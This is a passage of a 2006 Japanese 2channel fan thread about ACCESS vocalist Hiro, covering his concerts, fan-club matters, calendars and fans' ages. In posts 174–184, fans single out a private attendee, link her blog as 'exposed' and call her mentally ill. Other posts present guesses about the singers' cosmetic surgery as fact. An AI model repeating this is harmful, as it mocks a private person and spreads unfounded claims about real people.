歌がすごくうまくなってたし
何よりも歌に暖かい気持ちがこもってた気がする。
Yesterdayではグッときちまった。

162 :NO MUSIC NO NAME:2006/10/23(月) 16:17:22 ID:N30IPJA4
思った思った!!
特にカバー唄った時ヒロ歌上手いじゃんと思って久々にソロライブが良く感じた…
いつもは余りソロは興味ないんだが

163 :NO MUSIC NO NAME:2006/10/23(月) 18:20:18 ID:rB6+gh/h
>>159
邦楽板ですので仕様です

ここ最近ヒロはやっぱり歌が上手いなぁと自分も思うよ
>>161
哀しませた〜は気持ちこもってたね
本人も歌った後にグッときたみたいな事言ってたけど(東京)
別にこの曲に哀しい想い出があるとかいうのは全くないんだけど
ヒロが気持ちこめて歌ってるのが伝染して泣くところだった
伝染って言わないかw
伝わったっていう事なんだろうね

164 :NO MUSIC NO NAME:2006/10/23(月) 20:42:51 ID:yujY5XVo
今回のイベ、FC入会が間に合わずに行けなかったんだけど、ヒロ日記読んで感動しちまった…
今度ある時は、絶対行くよ!!!!
ヒロが好きだ…妖精でスマソ

165 :NO MUSIC NO NAME:2006/10/24(火) 09:02:58 ID:7E5agovU
つ妖精サイト

166 :NO MUSIC NO NAME:2006/10/24(火) 10:52:59 ID:mHE4cvET
>>165
2chも変わって来てるんだよ、お姉さん

167 :NO MUSIC NO NAME:2006/10/24(火) 14:34:38 ID:aSx34+tp
初2chなんですけど妖精ってどういう意味なんですか?

168 :NO MUSIC NO NAME:2006/10/24(火) 14:57:53 ID:anQZIfnx
>>167
キミのことだよ(^_^)

169 :NO MUSIC NO NAME:2006/10/24(火) 20:28:55 ID:9pRqrKEQ
ライブ中は特に妖精になるよ。
そうじゃなきゃ楽しめないじゃん。
あそこをトチッただの、髪型が変だの、そんなのどうでもよくなる。

>>164
次回は是非。
ヒロはお馬鹿だけど、今回のイベはマジ感動した。

170 :NO MUSIC NO NAME:2006/10/25(水) 06:25:15 ID:jdQFEbOb
本気になるのが遅すぎたね

ヲタ残ってないし、もうすぐ40才だし

171 :NO MUSIC NO NAME:2006/10/25(水) 07:46:24 ID:7zcf2cQr
男は40から!!!!…らしいので

172 :NO MUSIC NO NAME:2006/10/25(水) 21:16:18 ID:wFgUfJ7p
>>169
むしろあそこをトチッただの、髪型が変だの、が愛しくなる
コレこそ妖精か

173 :NO MUSIC NO NAME:2006/10/27(金) 00:01:45 ID:kkF0nPQ6


174 :NO MUSIC NO NAME:2006/10/27(金) 06:29:16 ID:Fe+XiPa2
ただ、名古屋と大阪のイベントに来てたほんの一部のファンにムカついた。
ヒロに話しかけてヒロのトークを止めるは、話しを流すわ、
質問コーナーをクチャクチャにして。
せっかく質問読まれた子がかわいそうだった。
前列の右側にいたヤツ。

他のファンもかなり引いてたと思う。

175 :NO MUSIC NO NAME:2006/10/27(金) 14:27:05 ID:GHzBDdnN
大阪いたね〜…
名古屋も同じ奴?
司会者やヒロも無視すりゃいいのに

176 :NO MUSIC NO NAME:2006/10/27(金) 19:44:11 ID:4bVIxtEz
声のふいんきからして同一じゃない?
アレは相当うざかった。
会場しらけてたし、ブログやミクシのレポでもキレてる人いっぱいいたよね。

177 :NO MUSIC NO NAME:2006/10/27(金) 19:53:42 ID:q6ukpzSg
そーゆー空気の読めないウザい人って、ヒロにいっぱい構ってもらったとか
思ってそう。
しかも周りのブーイングなんて、自分がヒロに構ってもらったから
嫉妬してるんだわ!とか言い出すんだよね。

178 :NO MUSIC NO NAME:2006/10/27(金) 20:10:07 ID:jbHNH7S8
大阪でうるさかった右側2列目にいたおばさんの集団と
右側5列目辺りにいた金髪の質問読まれた人。
名古屋も右側にいたの同じ人?

179 :NO MUSIC NO NAME:2006/10/28(土) 00:25:33 ID:Xz681yB3
大阪で「構って貰ってた」人、ブログ晒されてるなw


180 :NO MUSIC NO NAME:2006/10/28(土) 00:33:06 ID:vrT34Fup
kwsk

181 :NO MUSIC NO NAME:2006/10/28(土) 00:48:02 ID:Rnsh7bJD
転載www
ttp://diary3.fc2.com/cgi-sys/ed.cgi/crossbridge-eyt/

182 :NO MUSIC NO NAME:2006/10/28(土) 00:57:39 ID:BRTFpbsL
痛いのは精神病だから仕方ないな

183 :NO MUSIC NO NAME:2006/10/28(土) 04:13:08 ID:vmTcGPpH
前列の右側にいたヤツより
左側の10列前後にいた「大ちゃん」を連呼していたロリータがむかついた。
ここはソロのイベントであって灰汁のイベじゃねーよヽ(`Д´)ノ

184 :NO MUSIC NO NAME:2006/10/28(土) 07:06:59 ID:u1xF5ECn
大阪も名古屋も同じ人物だと思う。
頼むから、友達いたら止めてやってくれ。
他のファンに迷惑です。大迷惑です。会場の人達全員が思ってたハズ。
ヒロを見に来てるんです。彼の話を聞きに来てるんです。
はっきり言ってジャマでした。

そういう人がファンの中で一番マナーが悪い気がする。
ヒロも優しいから…。そんなイタイ奴無視すればいいのに。
でも、それが出来ないのがヒロだ。

>>183 それは名古屋?大阪?それは結構なオバサンの人では?
ゴスロリとは違う本当のロリータで、
ポプリの葉付けてるような…感じの人では?

ヒロのイベントで大ちゃん呼ぶのはやめて欲しいね。

185 :NO MUSIC NO NAME:2006/10/28(土) 07:11:41 ID:u1xF5ECn
↑ポプリおばさんの事じゃ無かったらスマソ。
左側の10列前後のロリータ…見たと思う。名古屋の方で。 by184

186 :NO MUSIC NO NAME:2006/10/28(土) 15:57:26 ID:U53GtU/6
灰汁スレから来ますた
11/4にサマスタの実況やるんで良かったら参加してください

∞access live DVD実況のお知らせ∞

◇日時 11/4(土・御大生誕39周年) 21:00〜
◇場所 カテゴリ:実況ch / 板:芸能ch (20:45頃スレ立て予定)
◇実況DVD サマスタ
◇持ち物 ケーキ、シャンパン (20:50より乾杯を実施します)

アーブロバンポン実況という楽しみが無くなった今、
御大の39歳の御生誕日にヲタだけで勝手に盛り上がろうという企画です。
皆様ケーキとシャンパンをお手元にご用意の上ご参加下さい。
(未成年者と下戸の方はおこちゃまびぃるをご用意下さい)
※次回予定:12/2(土)21:00〜黒鰤DVD実況予定


187 :NO MUSIC NO NAME:2006/10/28(土) 18:01:36 ID:oIKObG+J
了解(・ム・)ゞ

188 :NO MUSIC NO NAME:2006/10/28(土) 23:05:30 ID:NiJwmNRo
居るんだよね!
周りの事全く考えずに自分が良ければいいって人。
前回のaccessライブのバラード(ラビンユー)の時、
ヒロに合わせて一緒に大声で歌ってた奴!
あんたの歌声なんて聴きたくないんだよ!


189 :NO MUSIC NO NAME:2006/10/30(月) 01:56:41 ID:V7aIPUh8
185>ピンハじゃね?

190 :NO MUSIC NO NAME:2006/10/30(月) 10:22:29 ID:CHnQMj4K
もしかしたら動物園物語より前に
音楽活動についてお知らせ出来るカモと
ヒロラジオより

191 :NO MUSIC NO NAME:2006/10/30(月) 14:36:46 ID:xWgZtID3
舞台より前に灰汁でライブがあるんだろうか?!

192 :NO MUSIC NO NAME:2006/10/30(月) 14:56:23 ID:Dzou8aCT
最初に灰汁の軽いツアーがあって、その後に音源
でまたその後に大々的にツアーて言ってたしね。

193 :NO MUSIC NO NAME:2006/10/30(月) 14:57:26 ID:bQNiTAO0
ライブは来年じゃないか?
灰汁のCDリリース発表だと思うけど…
相方がディナーショーで何か発表するっぽい事も言ってたし

194 :NO MUSIC NO NAME:2006/10/31(火) 01:30:05 ID:jPWpXhD1
★黒田倫弘×伊藤賢一★ex‐Iceman率いるニュ‐プロジェクト【SCARECROW】

2007 xxx debut!!

★SCARECROW menber★

Vo. 黒田倫弘
Gc. 伊藤賢一
Ba. 石橋政得
Dr. 水江秀樹

by devil curve

195 :NO MUSIC NO NAME:2006/10/31(火) 10:44:33 ID:WWKxAIVf
今更ながらクラリのDVDが手元に届いたんだが
このDVDってブックレットとか付いてないの?
皿のみ?

196 :NO MUSIC NO NAME:2006/10/31(火) 10:54:24 ID:wSzhz57s
>195
皿のみだよ

197 :NO MUSIC NO NAME:2006/10/31(火) 12:33:14 ID:WWKxAIVf
>196
dクス。
今観終わった。
特典映像がブックレットみたいなもんか

198 :NO MUSIC NO NAME:2006/11/02(木) 02:53:52 ID:pUUCyTxm
http://news18.2ch.net/test/read.cgi/mnewsplus/1162259285/

199 :NO MUSIC NO NAME:2006/11/02(木) 19:58:52 ID:9kWdhG2q
皆>198のスレに行ったきりなのか?w
あさって実況やりますよ

∞access live DVD実況のお知らせ∞

◇日時 11/4(土・御大生誕39周年) 21:00〜
◇場所 カテゴリ:実況ch / 板:芸能ch (20:45頃スレ立て予定)
◇実況DVD サマスタ
◇持ち物 ケーキ、シャンパン (20:50より乾杯を実施します)

アーブロバンポン実況という楽しみが無くなった今、
御大の39歳の御生誕日にヲタだけで勝手に盛り上がろうという企画です。
皆様ケーキとシャンパンをお手元にご用意の上ご参加下さい。
(未成年者と下戸の方はおこちゃまびぃるをご用意下さい)
※次回予定:12/2(土)21:00〜黒鰤DVD実況予定


200 :NO MUSIC NO NAME:2006/11/03(金) 09:29:35 ID:Ia+0wKg/
sage

201 :NO MUSIC NO NAME:2006/11/03(金) 14:07:49 ID:caVE/bgc
誰もいない…
ヒロはいつ帰ってくるんだろね?

202 :NO MUSIC NO NAME:2006/11/03(金) 17:30:10 ID:+00Ce9ee
本人否定も肯定もしないけど結局この疑惑どうなの?w
http://music5.2ch.net/test/read.cgi/musicj/1162541711/

203 :NO MUSIC NO NAME:2006/11/03(金) 20:28:00 ID:LaRUDqp/
相方の目は生計だがヒロは不明

204 :NO MUSIC NO NAME:2006/11/03(金) 21:06:35 ID:PvLpTn8V
相方の目は明らかに生計ではないだろ
ヒロの目のほうが生計っぽいがな
まあ違うだろうけど

205 :NO MUSIC NO NAME:2006/11/03(金) 21:10:04 ID:Ia+0wKg/
sage

206 :NO MUSIC NO NAME:2006/11/03(金) 22:44:00 ID:UP7TvxL9
相方は切開でヒロは右目が整形じゃん!!
昔の顔見たら分かるでしょ

207 :NO MUSIC NO NAME:2006/11/04(土) 00:29:49 ID:8Kajo0Lj
漏れ経験者だから一般人よりは見抜けるが、
相方の瞼は明らかに生計だ。
しかも失敗で取れかかってる。
ヒロはもともと濃いから、生計っぽい瞼だけど、
天然もありえる。よって不明。


208 :NO MUSIC NO NAME:2006/11/04(土) 00:35:03 ID:oWd0KPfi
相方は埋没二重だよ。
切開だったらあんなガタガタにはならないし。


209 :NO MUSIC NO NAME:2006/11/04(土) 00:36:41 ID:8Kajo0Lj
ヒロはNYからいつ帰ってくるんだろ

210 :NO MUSIC NO NAME:2006/11/04(土) 00:41:29 ID:/7UDA5qT
相方はコンタクトし始めてから
さらにおかしくなった気がする

まあそんなことより取り敢えず相方オメw

211 :NO MUSIC NO NAME:2006/11/04(土) 00:59:18 ID:WBJR630Q
表に出るからには手直しも必要なわけねw

先日酒井彩名を久々にテレビで見たら明らかに鼻政経しててびびったwww
芸能人も大変だね

212 :NO MUSIC NO NAME:2006/11/04(土) 09:21:38 ID:jb/2gJOZ
まだNYにいるのか?

213 :NO MUSIC NO NAME:2006/11/04(土) 10:27:24 ID:7Ew7Xf8m
ヒロ灰汁再開前までは片方だけアユみたいな平行二重だったよね?
今は両方共綺麗な末広型二重になってる


214 :NO MUSIC NO NAME:2006/11/04(土) 13:40:47 ID:lvlTcOaY
整形くらい気にしないぜ!!!!
ヒロはヒロだ(^-^)

215 :NO MUSIC NO NAME:2006/11/04(土) 13:41:46 ID:ARZyde5m
来年早々忙しそうだ
こっちも風邪引いてる場合じゃないな

216 :NO MUSIC NO NAME:2006/11/04(土) 19:35:03 ID:a47LoPcO
アクセスライブ決定☆

217 :NO MUSIC NO NAME:2006/11/04(土) 19:40:43 ID:aArB0T4L
釣られて悪いが相方の目は明らかに天然
二重の幅がバラバラな時点で天然そのもの
整形した奴で明らかな垂れ目の人間なんて見たことない

218 :NO MUSIC NO NAME:2006/11/04(土) 20:43:00 ID:Fi+UV5jB
誤爆おめでとう
21:00からサマスタの実況やりまつよ

access live DVD サマスタ実況スレッド
http://live22x.2ch.net/test/read.cgi/dancesite/1162640380/

219 :NO MUSIC NO NAME:2006/11/04(土) 20:51:22 ID:956bDLlG
オレはアイプチ2年で
クッキリ二重を作り上げましたよw

220 :NO MUSIC NO NAME:2006/11/04(土) 22:14:23 ID:KhGxYMjr
相方は元は奥二重でヒロは右が元一重だよ

221 :NO MUSIC NO NAME:2006/11/04(土) 23:13:54 ID:mjI/vtUr
自分は疲れると三重になりますよ。


222 :NO MUSIC NO NAME:2006/11/05(日) 00:17:44 ID:kWvpOCdX
>>217
相方ヲタ乙

>整形した奴で明らかな垂れ目の人間なんて見たことない
喪前の周りにいないだけ。
相方は埋没してるよ。
ヒロだってアンチエイジング(キモ蛸愛用のヒアル注射)はしてる筈。

芸能人は生計がデフォなんだから、ムキになることでもない。


223 :NO MUSIC NO NAME:2006/11/05(日) 00:28:51 ID:8mtpOoaP
相方は整形してると思うけど、だからって嫌いにはならないし
正直どっちでもいい。
灰汁二人が元気に活動してくれるなら
整形なんてどうでもいいよ。

224 :NO MUSIC NO NAME:2006/11/05(日) 02:02:55 ID:bbhIUGiw
整形してるならもうちょっとしっかりやるだろ

というわけでしてないにイピョw

ヒロは一時期目をやったかなと思ってたが気を抜いてる時はやっぱり初期と同じ目してる
相方は単に年齢によるものだとオモ…年齢に勝てず垂れ方が増してる

225 :NO MUSIC NO NAME:2006/11/05(日) 14:43:36 ID:PW6DwUYR
今日はナイトだ!!!!

226 :NO MUSIC NO NAME:2006/11/06(月) 22:23:25 ID:IlqsYJuG
突然だけど、ヒロ(灰汁)のファンてどのくらいの年代の人が多いの?
自分20代前半だけど少数派かな…(´・ω・`)最近すきになったのでちょっと気になって。
それから、今日太陽入会したんだけどカレンダー注文は間に合うかな?
質問多くてスマソ。

227 :NO MUSIC NO NAME:2006/11/06(月) 22:30:18 ID:8K/XGXYA
>>226
20代後半〜30代あたりが中心かなぁ、と思う
ちなみに自分は23
カレンダーは完売しなければいつまででも売ってるはずw
まず今年の内には完売しないだろうから、大丈夫

228 :NO MUSIC NO NAME:2006/11/06(月) 22:33:51 ID:nun1iG4S
>226
20代後半から40代って感じだと…。
10年以上前だから、年齢層高いよね、灰汁は。

カレンダーも大丈夫だと思うよ?

229 :NO MUSIC NO NAME:2006/11/06(月) 22:45:31 ID:mInZtK7S
40代って…w
灰汁本人より年上がいるのか?w

230 :NO MUSIC NO NAME:2006/11/06(月) 22:47:10 ID:mInZtK7S
今年の太陽カレンダー買ったのは最近でつが何か

231 :NO MUSIC NO NAME:2006/11/06(月) 22:56:58 ID:kDWaNEuB
逆に聞きたいけどたまに10代や20代前半のファンを見たりするけどどこからヒロや灰汁を知ってファンになってるの?
一期みたいにメディアにはほとんど出て無いのに…

232 :NO MUSIC NO NAME:2006/11/06(月) 23:10:35 ID:8K/XGXYA
相方経由の奴を何人も知ってる
自分もアイスマン経由で相方の活動を遡ってヒロに至り、ヲタ歴8年くらい
あとはヒッパレ見て…っていうのを聞いた事がある

233 :NO MUSIC NO NAME:2006/11/06(月) 23:47:21 ID:IlqsYJuG
226です。
>227、228さんdクス!!
自分も相方経由かな?もともと西とか姫とかの楽曲が好きだったんだけど最近ヒロがテレビで歌ってるの見て灰汁も聞いてみようと思ったら…
ヤラレタ。
自分、一期の灰汁をほとんど知らないのでみんながウラヤマシス…

234 :NO MUSIC NO NAME:2006/11/07(火) 00:01:24 ID:nun1iG4S
西好きな人に灰汁すすめると、結構みんな聴いてくれるんだよね
相方の曲だから、曲自体はすんなりとイケるみたい。
問題はヒロの声だな
好き嫌いはっきり分かれてしまう…

235 :NO MUSIC NO NAME:2006/11/07(火) 09:10:25 ID:K4Hxp6cM
>>229
おまえさんオモシロイな。
灰汁じゃなくても本人たちより年下のファンだけと
思ってる香具師がこの世にいるなんて笑えるw

236 :NO MUSIC NO NAME:2006/11/07(火) 09:18:01 ID:kXR1VmC7
ウチのママンなんか、52だけど灰汁が好きだぞ

237 :NO MUSIC NO NAME:2006/11/07(火) 09:29:51 ID:l5xBP5UA
カレンダー、買った人の評価を聞いてから買おうとしてますが何か

238 :NO MUSIC NO NAME:2006/11/07(火) 09:43:56 ID:KlNPr7/c
>236
アイチャソ?www

239 :NO MUSIC NO NAME:2006/11/07(火) 14:50:50 ID:0URyXJ40
俺 40歳…(´・ω・`)

240 :NO MUSIC NO NAME:2006/11/07(火) 17:17:07 ID:wOKSp8zT
>239
確かにIDで確認いたしましたw

241 :NO MUSIC NO NAME:2006/11/07(火) 17:29:40 ID:kXR1VmC7
バロスww

242 :NO MUSIC NO NAME:2006/11/07(火) 22:42:03 ID:o66j9Zuw
自分22歳。ターチャソのEDで灰汁ハマったwww

243 :NO MUSIC NO NAME:2006/11/07(火) 22:51:15 ID:kXR1VmC7
アタイ、25
スキャブルでハマった…
前奏聴くだけで、感極まって泣けてくる

244 :NO MUSIC NO NAME:2006/11/07(火) 23:11:23 ID:AZUv/Xpr
自分29歳
宝石天使のCMでハマった…

245 :NO MUSIC NO NAME:2006/11/08(水) 00:01:03 ID:GpCMdOtz
アッシ36歳
デビュー時から沈黙まではまりまくり。
そして約12年ぶりFAN復帰。

246 :NO MUSIC NO NAME:2006/11/08(水) 00:21:20 ID:A6842PvE
漏れ27歳 14年前に気付いたら灰汁ファンになってた…きっかけ未だにわからず…orz

247 :NO MUSIC NO NAME:2006/11/08(水) 06:15:41 ID:byqrDfzF
漏れ27
三爺からの流れで灰汁に来た

248 :NO MUSIC NO NAME:2006/11/08(水) 09:34:56 ID:q1FhuApB
漏れ34
ファストツアーの時ダチに強制的にオカーケに連れて行かれて
ヒロの腰の低さに撃沈www

249 :NO MUSIC NO NAME:2006/11/08(水) 18:07:59 ID:NS37Lq7Z
ヒロや相方に出会えてよかったでつ…と、たまには妖精

250 :NO MUSIC NO NAME:2006/11/08(水) 19:34:08 ID:Mik8Yyyt
>>248
短足さに惚れたのかW

251 :NO MUSIC NO NAME:2006/11/08(水) 23:13:35 ID:pUuqs1E3
>>250
マジレスすると、たぶん、
グルッと回してキュッ!に撃沈したかと。

252 :名無しさん@お腹いっぱい。:2006/11/08(水) 23:17:45 ID:IyH+uGBa
ヒロは短足がイイんでつよww

253 :NO MUSIC NO NAME:2006/11/08(水) 23:19:38 ID:IyH+uGBa
誤爆スマソ

254 :NO MUSIC NO NAME:2006/11/09(木) 08:24:39 ID:GShRnXbx
誤爆くらい気にするな

255 :NO MUSIC NO NAME:2006/11/09(木) 17:09:20 ID:qCeu/Jhw
短足は仕方ないっつうか寧ろ萌えなんだが
余計に足が短く見える衣装のセンスにry

256 :NO MUSIC NO NAME:2006/11/09(木) 21:24:49 ID:GShRnXbx
ピチピチものはやめていただきたい…

257 :NO MUSIC NO NAME:2006/11/09(木) 22:22:48 ID:sWR8mSB/
ピチピチがいい

258 :NO MUSIC NO NAME:2006/11/09(木) 23:41:07 ID:89d8e1Z5
私、24歳。母親が男と出ていった日のMステにACCESSでてむーんしゃいんだんす歌って泣きながら見ていた。それがきっかけ。

259 :NO MUSIC NO NAME:2006/11/09(木) 23:44:39 ID:F4Eo5q1O
泣ける話だな

260 :NO MUSIC NO NAME:2006/11/09(木) 23:45:44 ID:89d8e1Z5
追伸。258です。ヒロ見ていたら静岡県にも追加で来てくださいm(__)m

261 :NO MUSIC NO NAME:2006/11/10(金) 17:14:49 ID:dKyDopMe
漏れも27
裸欲望でハマりました
あと性格の良さとここ最近の歌の上達ぶりにどんどん引き込まれています

262 :NO MUSIC NO NAME:2006/11/10(金) 18:46:39 ID:Nb+mJONQ
カレンダー買わないはずだったのに… orz

あの表紙は反則だ

263 :NO MUSIC NO NAME:2006/11/11(土) 20:32:21 ID:l6xA6n1m
ピロ大好き

264 :NO MUSIC NO NAME:2006/11/11(土) 20:47:40 ID:A2sDZjTn
ヒロお帰り(^-^)!

265 :NO MUSIC NO NAME:2006/11/14(火) 05:16:43 ID:vnBW1mqC
ヒロヽ(´∇`)ノカレンダーめったゃカッコイイ

266 :sage:2006/11/14(火) 05:19:35 ID:vnBW1mqC
すいません上げてしまいましたorz

267 :NO MUSIC NO NAME:2006/11/14(火) 18:02:05 ID:+u4OIYUs
>>265-266
ワロタ
焦るんじゃないよ

268 :NO MUSIC NO NAME:2006/11/14(火) 19:54:59 ID:SKUHAMck
上げたうえに、『めったゃカッコイイ』だもんな
かわいいヤツめ

269 :NO MUSIC NO NAME:2006/11/16(木) 00:34:07 ID:fiDz8Nmu
最後に買ったヒロタソカレンダーは髭之のだwww

270 :NO MUSIC NO NAME:2006/11/16(木) 00:38:06 ID:fiDz8Nmu
>>269
髭生えてたっけな?ソフトモヒのやつですわ。

271 :NO MUSIC NO NAME:2006/11/16(木) 00:56:04 ID:m73YNDDB
私も最後に買ったのが髭之w

272 :NO MUSIC NO NAME:2006/11/16(木) 18:10:13 ID:v9n69obN
ヒロFCの会員証とかって、次の会報と一緒に送られてくるの?
それとも会報とは別に届くの?誰か教えてください!!


273 :NO MUSIC NO NAME:2006/11/16(木) 19:54:51 ID:9qEcnJK7
>>272
状況がよく分からんがオフィ行ってみれば?

274 :NO MUSIC NO NAME:2006/11/16(木) 21:20:26 ID:v9n69obN
>>273
ありがとう。オフィにも特に何も記載されてなかったもので。
2週間くらい前に入会金振り込んだんだけど何の音沙汰もなかったから
心配になって・・
さすがに気が早すぎますかね
もうちょっと気長に待ってみますね

275 :NO MUSIC NO NAME:2006/11/16(木) 21:46:06 ID:D8YTYUg9
>>272
俺、9月に入会手続きしたけど、1ヶ月かからないくらいに会員証とクラリん時の会報が一緒に届いたよ
ローソンから手続きしたんだけど、受領書には約1ヶ月後に…みたいな事が書いてあったから、2週間くらい前に入金したなら12月あたまくらいにはくるんジャマイカ?

276 :NO MUSIC NO NAME:2006/11/16(木) 22:22:19 ID:v9n69obN
>>275
そうなんですか?!詳しくどうもありがとう。
じゃあやっぱり12月辺りまで楽しみに待ちます。
灰汁のツアー行ってみたかったから、もっと早く入会しとけばよかった・・・

277 :NO MUSIC NO NAME:2006/11/17(金) 01:09:01 ID:/u/X7tvo
今まで田舎に住んでいて、上京を機会にライヴ見に行きたいと思うのですが、ツアー一人参加とか変ですかね?

278 :NO MUSIC NO NAME :2006/11/17(金) 08:44:20 ID:AogH1EsJ
私はいつも一人だ
少し寂しいかもしれないが
もう子供じゃないんだし…
おひとりさまも自由でいいものだ

279 :NO MUSIC NO NAME:2006/11/17(金) 10:22:02 ID:jlIM1CX4
漏れも一人
周りにはヲタやってるの内緒なもんで

280 :NO MUSIC NO NAME:2006/11/17(金) 20:35:25 ID:9KGW8FJ9
いつもチケ取ってやってた友人が立て替えたチケ代を返さない(二度目)ので
ちょっと距離置いてて今回のツアーは完全に一人旅だよ
正直、隣の席に友達がいれば何割増かで楽しいと思うけど
身近にヲタ仲間がいないっていう人は案外多いらしいので大丈夫だよ

281 :NO MUSIC NO NAME:2006/11/17(金) 21:02:50 ID:/xTPe2WW
この歳になると、みんなケコーンして子供がいて…
痴呆だから特にそうだから、常に一人です

282 :NO MUSIC NO NAME:2006/11/18(土) 15:38:03 ID:9lzP0Yjo
俺もイイ歳なんでツレだったヤシらは皆ヲタ卒業だ
最近は一人で全通しても慣れちまったな…

283 :NO MUSIC NO NAME:2006/11/18(土) 19:37:03 ID:OxKJx86q
ジブンも一緒してた友ら卒業にともない1人全通だ
会場に行けば一応友はいるし
一緒取ろうとも言われるが
良席良番を多少気にされるから1人で取る方が気が楽になった
同じ1人参加の人で感じの良さそうな人だたら話かけて盛り上がる時もあるしな

284 :NO MUSIC NO NAME:2006/11/18(土) 23:28:23 ID:83i4kwVA
ひろのファンクラブ更新の金額を教えてください!

285 :NO MUSIC NO NAME:2006/11/19(日) 09:16:24 ID:oWx6sgiR
4000円

286 :NO MUSIC NO NAME:2006/11/19(日) 20:16:07 ID:kI7XgeiH
振込用紙山ほど書いて金おろして
雨の中ひいこら振込に行った

…カレンダーの振込番号違ってたの忘れてた…orz
皆様もご注意あれ…

287 :NO MUSIC NO NAME:2006/11/19(日) 21:54:39 ID:8I4ZjPan
お疲れちゃん( ^-^) _旦~~

288 :NO MUSIC NO NAME:2006/11/21(火) 00:02:10 ID:GYPRnaBl
そんな日もあるさ…

つ【バナナ】

289 :NO MUSIC NO NAME:2006/11/21(火) 23:38:07 ID:CD/gXsMg
誰かいませんかー…

290 :NO MUSIC NO NAME:2006/11/21(火) 23:59:08 ID:pU3bNRxP
来たけどもう遅い??今回のライブも我慢だよ。キメルって人のCD買ってみた。大介さんがdvdに写ってるから

291 :NO MUSIC NO NAME:2006/11/22(水) 08:52:54 ID:48+yB5oM
つ 御大スレ

292 :NO MUSIC NO NAME:2006/11/22(水) 19:02:18 ID:ebiiKte8
今、御大スレに行きたくないぽ…

293 :NO MUSIC NO NAME:2006/11/22(水) 19:05:49 ID:zbc43HVG
>>292
おおwあっちで見たIDの人w
あっちは人が多いからかちょっとしたきっかけで荒れるな
灰汁ヲタはソロスレに出て来るなと言われればそれまでなんだけど
一応ソロも聴くしなぁ

294 :NO MUSIC NO NAME:2006/11/22(水) 19:36:26 ID:48+yB5oM
つ灰汁スレ

295 :NO MUSIC NO NAME:2006/11/22(水) 20:05:16 ID:zbc43HVG
>>294
灰汁スレでヒロはともかく西川くんやkimeruくんの話をしても仕方なかろう

296 :NO MUSIC NO NAME:2006/11/22(水) 20:54:22 ID:5E/FhKcm
ヒロロロ

297 :NO MUSIC NO NAME:2006/11/22(水) 21:28:55 ID:zbc43HVG
ガツガツ議論する話題でもないよな、もういいか

動物園は寒い時期だねえ
舞台はそれなりにきっちりした服装がいいようだけど
ダウンジャケットくらいしか持ってないわ…
コートでも新調した方がいいのかなー

298 :NO MUSIC NO NAME:2006/11/22(水) 21:35:50 ID:QsvIA0Nu
慎重に新調してね(^-^)!!!!!!!!

299 :NO MUSIC NO NAME:2006/11/22(水) 21:36:56 ID:zbc43HVG
>>298
余計寒いわボケ!

300 :NO MUSIC NO NAME:2006/11/22(水) 22:30:31 ID:5E/FhKcm
微妙にツボった…w

301 :NO MUSIC NO NAME:2006/11/23(木) 18:40:26 ID:pb5n8nU9
>298
それこそ相方の言いそうな…w

302 :NO MUSIC NO NAME:2006/11/23(木) 21:24:55 ID:ij4gE5Bt
相方が言うんだったら
「コートは身長に合わせて、慎重に新調してくださいねぇ〜」

303 :NO MUSIC NO NAME:2006/11/24(金) 20:56:43 ID:rFCzyrCD
ダシャレスレがあると聞いてやたて来ました (・ム・)ノ

304 :NO MUSIC NO NAME:2006/11/24(金) 21:33:03 ID:E1XVomf7
>>302親父ギャグ癒されるヽ(´∇`)ノもえ

305 :NO MUSIC NO NAME:2006/11/25(土) 13:19:44 ID:JJlnHbld
ttp://user.auctions.yahoo.co.jp/jp/show/mystatus?select=won


306 :NO MUSIC NO NAME:2006/11/26(日) 12:00:11 ID:5H6ONAWv
それでも動かないこのスレが素敵だw

今夜は久しぶりにオンタイムでヒロラジオ聴いてみようかな…

307 :NO MUSIC NO NAME:2006/11/26(日) 19:00:52 ID:ttdeXJsV
本人と瓜二つっていうスレも
また素敵だw

308 :NO MUSIC NO NAME:2006/11/27(月) 18:33:12 ID:PEVzYpxd
灰汁Yahoo! ニュース!!!!!!!!

309 :NO MUSIC NO NAME:2006/11/27(月) 20:43:13 ID://LpURdN
何の釣りかと思ったらマジかよw
しかもマルチすんなw

310 :NO MUSIC NO NAME:2006/11/27(月) 20:47:22 ID:lGp9JgQF
そう言えば動物園チケ結果はもうすぐ届く頃だよね

311 :NO MUSIC NO NAME:2006/11/27(月) 20:53:04 ID:WRDTq6HH
動物園は今日ファンクラブの優先を締め切ったばかりだが
一般発売日がすぐだから来週中には優先の結果もあらかた届くだろうけど

312 :NO MUSIC NO NAME:2006/11/27(月) 21:02:51 ID:lGp9JgQF
>>311
そうか締切が今日なのを忘れてたな
それで12月8日までに当落ハガキか
せわしないなぁw

313 :NO MUSIC NO NAME:2006/11/29(水) 17:31:11 ID://pX/yoC
動物園の一般チケットいつ頃発売でしょうか?

314 :NO MUSIC NO NAME:2006/11/30(木) 00:07:17 ID:7UxPI0ri
つ オフィ

315 :NO MUSIC NO NAME:2006/11/30(木) 00:44:02 ID:LowwLiDG
ここで答えを待つよりピアとかで検索かければ一瞬だと思うんだがな


316 :NO MUSIC NO NAME:2006/12/01(金) 15:57:31 ID:yCiOgXZ3
営業日誌 たまにはageホッシュ

317 :NO MUSIC NO NAME:2006/12/02(土) 19:47:35 ID:VGC8Xsgy
動物園当落葉書マダァ-? (・∀・ )っ/凵⌒☆チンチン

318 :NO MUSIC NO NAME:2006/12/02(土) 20:47:50 ID:wWveLAaX
こっちに予告すんの忘れてたけど、
もうすぐ灰汁の黒鰤DVD実況やります!

【12/2】access 黒鰤実況スレ
http://live22x.2ch.net/test/read.cgi/dancesite/1165059902/l50

319 :NO MUSIC NO NAME:2006/12/06(水) 14:18:13 ID:IR/jYVwA
オフィ行ったけど動物園ハガキまだ発送してないのか??
大丈夫か?

320 :NO MUSIC NO NAME:2006/12/06(水) 16:08:49 ID:Ij/kDM4E
明日全員に電話がかかってきます

321 :NO MUSIC NO NAME:2006/12/06(水) 21:07:13 ID:DSr6Pr9G
(^-^) オレが電話するよ!

322 :NO MUSIC NO NAME:2006/12/06(水) 21:50:20 ID:B+/gCZ+Y
( ゚Д゚)】間に合ってます〜

323 :NO MUSIC NO NAME:2006/12/07(木) 02:00:06 ID:zBEyQDxC
チケットぴあで席確保できたよ〜

324 :NO MUSIC NO NAME:2006/12/08(金) 22:40:19 ID:7rE8YlKK
そろそろ日記がきてもいい頃だが…

325 :NO MUSIC NO NAME:2006/12/11(月) 20:05:16 ID:oOOs47qR
DSにハマるヒロタン

326 :NO MUSIC NO NAME:2006/12/15(金) 12:38:49 ID:qyKdKXBt
ホシュ

327 :NO MUSIC NO NAME:2006/12/15(金) 23:39:32 ID:uWGoYN9Y
静岡にも来てよ(T_T)

